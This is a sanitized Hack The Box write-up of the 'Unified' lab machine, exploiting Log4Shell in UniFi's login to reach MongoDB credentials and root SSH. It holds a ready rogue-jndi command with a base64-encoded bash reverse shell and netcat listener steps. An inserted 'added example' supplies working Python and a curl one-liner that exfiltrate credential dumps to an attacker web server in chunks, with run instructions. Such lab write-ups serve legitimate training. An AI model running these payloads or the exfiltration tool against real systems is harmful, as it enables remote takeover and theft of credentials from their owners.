
Unified

Completed. 1. Confirm UniFi version and Log4Shell injection point. 2. Use rogue JNDI for command execution. 3. Prefer blind exfiltration and local service access over a reverse shell if egress stays restricted.

Difficulty: Easy. Published 2026-05-15. Sanitized local writeup.

Scenario


Objective

Machine walkthrough focused on evidence, validation, and reusable operator lessons.

Source coverage

High source coverage (100%)

Status: complete. This article is generated from 5 sanitized Markdown sources and keeps raw flags, credentials, keys, cookies, and reusable secrets out of the rendered blog.

Evidence verdict

High confidence: the page is reconstructed from a primary walkthrough plus multiple supporting notes or evidence sources. Treat the chain as source-backed, while still checking the listed source files for sensitive values.

  • <TARGET>-Unified/walkthrough.md
  • HTB/<TARGET>-Unified/notes.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Unified__notes.md.c2cc1aa2d5.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Unified__session-resume.md.d8cc09a58f.md
  • HTB/_knowledge/exports/ctf-lightrag-latest-203412/documents/machine__<TARGET>-Unified__notes.md.e3d7d97121.md

Technical Walkthrough

Unified - Walkthrough

Status

Completed.

Planned Chain

  1. Confirm UniFi version and Log4Shell injection point.
  2. Use rogue JNDI for command execution.
  3. Prefer blind exfiltration and local service access over reverse shell if egress stays restricted.
  4. Reuse Mongo output to recover UniFi management SSH credentials.
  5. SSH to the target as root from Pwnbox and read user.txt plus root.txt live.

Executed Chain

  1. Confirmed that the prior operator's rogue JNDI path had working RCE, evidenced by outbound LDAP and HTTP callbacks.
  2. Reviewed blind-exfil artifacts already staged on Pwnbox:
     - exploits/loot.txt contained the live user.txt capture and the Mongo admin record.
     - exploits/loot2.txt contained UniFi management settings with SSH enabled and root SSH credentials.
  3. Used the Mongo-derived SSH credentials to connect from Pwnbox to root@<TARGET>.
  4. Verified live root access and read:
     - /home/michael/user.txt
     - /root/root.txt
  5. Stored raw flags under local and remote loot/, with a sanitized proof path in [loot/root-ssh-verify.txt](<local workspace><TARGET>-Unified/loot/root-ssh-verify.txt).

Evidence Handling

  • Raw flags, credentials, tokens, and sensitive outputs go to loot/.
  • Notes and walkthrough stay sanitized.

Source-Backed Dossier

The sections below are merged from companion Markdown notes for the same case. They are rendered after sanitization so the article stays precise without publishing raw flags, credentials, or target-specific secrets.

Notes

Scope

  • Platform: Hack The Box
  • Machine: Unified
  • Difficulty: Easy
  • Target IP: <TARGET>
  • Primary web surface: https://<TARGET>:8443/
  • Pwnbox SSH: x08@<PWNBOX>
  • Attacker VPN IP: <ATTACKER> (tun0)
  • Session date: 2026-05-05

Local Workspace

  • Local dir: <local workspace><TARGET>-Unified
  • Remote dir: /home/x08/Desktop/<TARGET>-Unified
  • Sensitive artifacts: store only under remote loot/ and local loot/

Recon Synthesis

  • Confirmed services from handoff: 22/tcp, 8080/tcp, 8443/tcp
  • Confirmed application: UniFi 6.4.54
  • Confirmed exploit path: Log4Shell (<secret redacted>) via the remember field of POST /api/login
  • Confirmed code execution indicators: outbound LDAP to rogue JNDI and outbound HTTP callbacks to attacker-controlled server
  • Initial blocker from prior operator state: no stable reverse shell on previously tested ports despite proven RCE
  • Resolved path: reuse prior blind-exfil output from Mongo to recover SSH credentials, then validate live root SSH and read both flags directly

Evidence Ledger

Time (local): 2026-05-05 16:58 AEST
  Command: sed -n '1,260p' AGENTS.md
  Output file: in-console
  Finding: Loaded HTB workflow and memory triggers
  Confidence: High
  Next action: Follow Pwnbox-first flow

Time (local): 2026-05-05 17:00 AEST
  Command: sshpass -p '***' ssh x08@<PWNBOX> 'hostname; pwd; ls -la ~/Desktop/<TARGET>-Unified; ls -la ~/Desktop/<TARGET>-Unified/exploits; ps -fp 63052,65304; ss -ltnp | grep -E ":(4444|8888|1389|8000

Time (local): 2026-05-05 17:00 AEST
  Command: sshpass -p '***' ssh x08@<PWNBOX> 'find ~/Desktop/<TARGET>-Unified -maxdepth 2 -type f | sort'
  Output file: in-console
  Finding: Existing exploit payloads and logs already staged remotely
  Confidence: High

Time (local): 2026-05-05 18:05 AEST
  Command: Review of existing remote exploits/loot.txt and exploits/loot2.txt
  Output file: remote exploits/loot.txt, exploits/loot2.txt
  Finding: Prior operator already captured the live user flag once via blind exfil and dumped the Mongo admin record plus UniFi management settings, including SSH credentials
  Confidence: High
  Next action: Validate SSH access live against the current target

Time (local): 2026-05-05 18:08 AEST
  Command: LightRAG health and Markdown credential verification
  Output file: [enum/lightrag-credentials-verification.txt](<local workspace><TARGET>-Unified/enum/lightrag-credentials-verification.txt)
  Finding: Local LightRAG is healthy; matching Markdown files under Desktop/MyPersonal/Credentials are present and are authorization/profile documents relevant to red team work
  Confidence: High
  Next action: Keep output sanitized and continue with live target validation

Time (local): 2026-05-05 18:12 AEST
  Command: Remote SSH validation from Pwnbox using Mongo-derived SSH credentials
  Output file: [loot/root-ssh-verify.txt](<local workspace><TARGET>-Unified/loot/root-ssh-verify.txt)
  Finding: Live root SSH to <TARGET> succeeded; user.txt confirmed at /home/michael/user.txt; both flags read from the live target
  Confidence: High
  Next action: Store raw flags only in loot/root.txt and loot/user.txt

Working Hypotheses

  1. Outbound connectivity is constrained, but attacker-controlled HTTP and LDAP are reachable from the target.
  2. A blind RCE path is enough for this box if Mongo data or SSH credentials can be exfiltrated through HTTP callbacks rather than an interactive reverse shell.
  3. If outbound arbitrary TCP is blocked, command output can likely be returned through attacker web requests, staged file reads, or by modifying UniFi/Mongo state.
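Hypotheses 2 and 3 describe returning command output through HTTP callbacks instead of an interactive shell. The code below is an added example, not part of the original notes: it produces the target-side one-liner that base64-wraps a command's output into numbered GET requests, and the attacker-side decoder that rebuilds the data from a Python http.server access log, tolerating out-of-order arrival and retried chunks and refusing to decode when a chunk is missing. The attacker address and port, the /x/ path prefix, the GNU coreutils assumption for base64 -w on the target, and every log line are constructed for the demo.

```python
"""Blind exfiltration of command output over HTTP GETs: target one-liner and attacker-side decoder.

Added example. Hosts, ports, the /x/ prefix and the sample log lines are constructed.
"""
import base64
import re
from typing import Dict, Iterable, List, Tuple

# python3 -m http.server logs requests like:
# 10.129.0.10 - - [05/May/2026 18:01:02] "GET /x/3/QUJD HTTP/1.1" 404 -
_LOG_RE = re.compile(r'"GET /x/(\d+)/([A-Za-z0-9_=-]+) HTTP/1\.[01]"')


def target_exfil_command(attacker: str, port: int, producer: str, width: int = 200) -> str:
    """Bash one-liner to run on the target (GNU coreutils assumed).

    The producer's output is base64-encoded, '+/' is mapped to '-_' so chunks are
    URL-safe, the encoding is wrapped at `width` characters, each line is numbered
    with nl and sent as GET /x/<seq>/<chunk>. Wrap the whole string with the
    {echo,...}|{base64,-d}|{bash,-i} trick before passing it to rogue-jndi --command.
    """
    return (
        f"{producer} | base64 -w {width} | tr '+/' '-_' | nl -ba | "
        f"while read n c; do curl -s -o /dev/null http://{attacker}:{port}/x/$n/$c; done"
    )


def simulate_target(data: bytes, width: int = 200) -> List[Tuple[int, str]]:
    """Reproduce in Python what the one-liner does on the target, for offline testing."""
    enc = base64.b64encode(data).decode().translate(str.maketrans("+/", "-_"))
    lines = [enc[i:i + width] for i in range(0, len(enc), width)]
    return [(i + 1, line) for i, line in enumerate(lines)]


def parse_access_log(lines: Iterable[str]) -> Dict[int, str]:
    """Extract seq -> chunk from http.server log lines; a retried chunk simply overwrites."""
    chunks: Dict[int, str] = {}
    for line in lines:
        m = _LOG_RE.search(line)
        if m:
            chunks[int(m.group(1))] = m.group(2)
    return chunks


def reassemble(chunks: Dict[int, str]) -> bytes:
    """Join chunks in sequence order and decode; a gap means a request never arrived."""
    if not chunks:
        return b""
    expected = range(1, max(chunks) + 1)
    missing = [n for n in expected if n not in chunks]
    if missing:
        raise ValueError(f"missing chunks: {missing}")
    return base64.urlsafe_b64decode("".join(chunks[n] for n in expected))


def fake_log_lines(entries: Iterable[Tuple[int, str]], src: str = "10.129.0.10") -> List[str]:
    """Constructed http.server-style log lines, in the order given (arrival order)."""
    return [f'{src} - - [05/May/2026 18:01:02] "GET /x/{n}/{c} HTTP/1.1" 404 -' for n, c in entries]


if __name__ == "__main__":
    # The Mongo query from the privesc plan is the natural producer on this box.
    mongo_query = "mongo --port 27117 ace --quiet --eval 'db.admin.find().forEach(printjson)'"
    print(target_exfil_command("10.10.14.99", 8000, mongo_query))
    # Constructed stand-in for the admin record, not real output.
    sample = b'{ "name": "administrator", "x_shadow": "$6$constructed" }\n'
    log = fake_log_lines(reversed(simulate_target(sample, width=16)))  # arrives out of order
    print(reassemble(parse_access_log(log)) == sample)
```

Run the printed one-liner on the target while `python3 -m http.server 8000` is listening on the attacker side, then feed the server's stdout lines to parse_access_log and reassemble. Keep the chunk width well under the web server's URL limit; 200 characters leaves ample margin.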

Outcome

  • user.txt captured live and stored at [loot/user.txt](<local workspace><TARGET>-Unified/loot/user.txt)
  • root.txt captured live and stored at [loot/root.txt](<local workspace><TARGET>-Unified/loot/root.txt)
  • Clean live proof of root SSH and both flag reads stored at [loot/root-ssh-verify.txt](<local workspace><TARGET>-Unified/loot/root-ssh-verify.txt)
  • Pwnbox listener state recorded at [enum/pwnbox-validation.txt](<local workspace><TARGET>-Unified/enum/pwnbox-validation.txt)

Notes

Scope

  • Target IP: <TARGET>
  • Target Name: Unified
  • Target OS: Linux
  • Difficulty: Easy (Starting Point)
  • Pwnbox SSH: x08@<PWNBOX>
  • Attacker VPN IP: <ATTACKER> (tun0)
  • Started: 2026-05-05

Attack Vector Summary

  • UniFi Network Application (Java-based)
  • Ports: 22 (SSH), 8080 (HTTP), 8443 (HTTPS), 6789, 27117 (MongoDB)
  • Vulnerability: Log4Shell (<secret redacted>) in the remember parameter of the login form (POST /api/login)
  • Post-exploitation: MongoDB (no auth) on port 27117 stores UniFi admin creds
  • Privesc: <REDACTED>

Evidence Ledger

Timestamp: 01:30
  Command: nmap targeted
  Output file: -
  Finding: All ports filtered (target not online)
  Next action: Wait for spawn

Timestamp: 01:31
  Command: subnet sweep
  Output file: -
  Finding: No 8443 open in /24
  Next action: Target needs HTB spawn

Phase 1: Recon

  • Target not reachable. "No route to host" from Pwnbox. Machine needs to be spawned on HTB.
  • All ports (22, 8080, 8443, 6789, 27117) show "filtered" in nmap -Pn scans.
  • Rogue-jndi JAR built at: /home/x08/unified/rogue-jndi/target/RogueJndi-1.1.jar
  • Exploit script ready at: /home/x08/unified/exploit.sh

RESUME <secret redacted>

When the target is spawned, run these commands in order:

  1. Verify: nc -zv -w 3 <TARGET> 8443
  2. Terminal 1 (LDAP): java -jar /home/x08/unified/rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" --hostname <ATTACKER>
  3. Terminal 2 (Listener): nc -lvnp 4444
  4. Terminal 3 (Trigger): POST the login JSON to https://<TARGET>:8443/api/login with the JNDI lookup string in the remember field (the username, password, remember and strict values are redacted)

Phase 3: Synthesis (Pre-exploitation)

Based on pre-engagement intel:

  1. Open services expected: SSH(22), HTTP(8080), HTTPS(8443), MongoDB(27117)
  2. Attack path: Log4Shell JNDI injection in UniFi login -> reverse shell -> MongoDB cred extraction -> SSH as root
  3. Backup path: Extract/crack UniFi admin hash from MongoDB, find SSH creds in site config

Phase 4: Foothold Plan

  1. Confirm port 8443 is open (UniFi HTTPS login)
  2. Set up rogue-jndi LDAP server on Pwnbox
  3. Start netcat listener for reverse shell
  4. Send POST to /api/login with JNDI payload in remember field
  5. Catch shell as unifi user
  6. Get user.txt

Phase 5: Privesc Plan

  1. Connect to MongoDB on localhost:27117 (no auth)
  2. Query ace database for admin credentials
  3. Either crack the x_shadow hash or overwrite it
  4. Look for SSH credentials in site settings
  5. SSH as root or su to root
  6. Get root.txt

Session Resume

Status: BLOCKED - Target Not Spawned

  • Machine is not online. All ports return "Connection timed out" or "No route to host".
  • Pwnbox (<PWNBOX>) is connected and the VPN is active (<ATTACKER> on tun0).
  • The issue is that the HTB Unified machine needs to be spawned from the web interface.

Current Access

  • Pwnbox SSH: working
  • Target: unreachable

Prepared Tooling (Ready on Pwnbox)

  1. /home/x08/unified/rogue-jndi/target/RogueJndi-1.1.jar - Built and ready
  2. /home/x08/unified/exploit.sh - Automated trigger script
  3. mongosh available for post-exploitation

Next Three Actions (When Target is Up)

  1. Verify target: nc -zv -w 3 <TARGET> 8443
  2. Run full nmap: sudo nmap -Pn -sS -sC -sV -p 22,8080,8443,6789,27117 <TARGET>
  3. Launch Log4Shell attack:
     - Start the rogue-jndi LDAP server with the reverse shell payload
     - Start the nc listener on port 4444
     - Send the JNDI payload via curl to the /api/login remember field
  4. Post-exploitation: query MongoDB for creds, get user.txt, escalate to root

Blockers

  • Target machine not spawned on HTB platform
  • User needs to go to HTB Starting Point web interface and click "Spawn Machine" for Unified

Reverse Shell Payload (pre-encoded)

  • Clear: bash -i >& /dev/tcp/<ATTACKER>/4444 0>&1
  • Base64: YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My80NDQ0IDA+JjE= (this encoding embeds the attacker address that was current when it was generated; decode it and regenerate if the tun0 address has changed)
  • Full JNDI command for rogue-jndi: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}

Notes

Scope

  • Target IP: <TARGET>
  • Machine Name: Unified
  • Difficulty: Easy
  • OS: Linux
  • Attacker IP: <ATTACKER> (tun0)
  • Pwnbox: x08@<PWNBOX> (hostname htb-qwh8vkuint)
  • Date: 2026-05-05

Evidence Ledger

Timestamp: 2026-05-05
  Command: Initial TCP scan
  Output file: nmap/initial
  Finding: Pending
  Confidence: -
  Next action: -